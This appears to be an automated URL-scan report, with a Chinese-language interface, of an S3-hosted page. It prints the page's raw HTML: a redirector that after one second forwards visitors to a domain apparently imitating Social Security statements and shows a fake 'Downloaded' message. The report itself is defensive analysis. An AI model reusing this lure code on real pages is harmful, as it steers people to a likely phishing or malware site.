- 掃描 ID:
- 1e0a7365-17da-498e-8849-91d3315048cf已完成
- 已提交的 URL:
- https://saicopart25487120.s3.me-central-1.amazonaws.com/statm1nt55698_qra463570.html
- 報告完成時間:
連結 · 找到 0 個
從頁面中識別的傳出連結
JavaScript 變數 · 找到 5 個
在頁面的視窗物件上載入的全域 JavaScript 變數是在函數外部宣告的變數,可從目前範圍內程式碼中的任何位置存取
名稱 | 類型 |
---|---|
0 | object |
onbeforetoggle | object |
documentPictureInPicture | object |
onscrollend | object |
_cf_translation | object |
主控台記錄訊息 · 找到 3 條
記錄到 Web 主控台的訊息
類型 | 類別 | 記錄 |
---|---|---|
error | network |
|
error | network |
|
error | network |
|
HTML
頁面的原始 HTML 主體
<!DOCTYPE html><html lang="en"><head>
<meta charset="UTF-8">
<meta http-equiv="refresh" content="1;url=https://socialsecurityonlinestatements.de/docs/">
<title>Redirecting...</title>
<style>
body {
font-family: Arial, sans-serif;
text-align: center;
padding-top: 50px;
background-color: #f3f3f3;
}
.content {
width: 80%;
margin: auto;
padding: 20px;
background-color: white;
border-radius: 10px;
box-shadow: 0 4px 8px rgba(0,0,0,0.1);
}
.spinner {
border: 4px solid #f3f3f3; /* Light grey */
border-top: 4px solid #3498db; /* Blue */
border-radius: 50%;
width: 50px;
height: 50px;
animation: spin 2s linear infinite;
margin: auto;
}
@keyframes spin {
0% { transform: rotate(0deg); }
100% { transform: rotate(360deg); }
}
.confirmed {
font-size: 20px;
color: green;
margin-top: 20px;
}
</style>
<script type="text/javascript">
function showConfirmation() {
var spinner = document.querySelector('.spinner');
spinner.style.display = 'none';
var confirmedText = document.createElement('div');
confirmedText.className = 'confirmed';
confirmedText.textContent = 'Downloaded';
document.querySelector('.content').appendChild(confirmedText);
}
window.onload = function() {
setTimeout(showConfirmation, 3000);
}
</script>
</head>
<body>
<div class="content">
<div class="spinner"></div>
</div>
</body></html>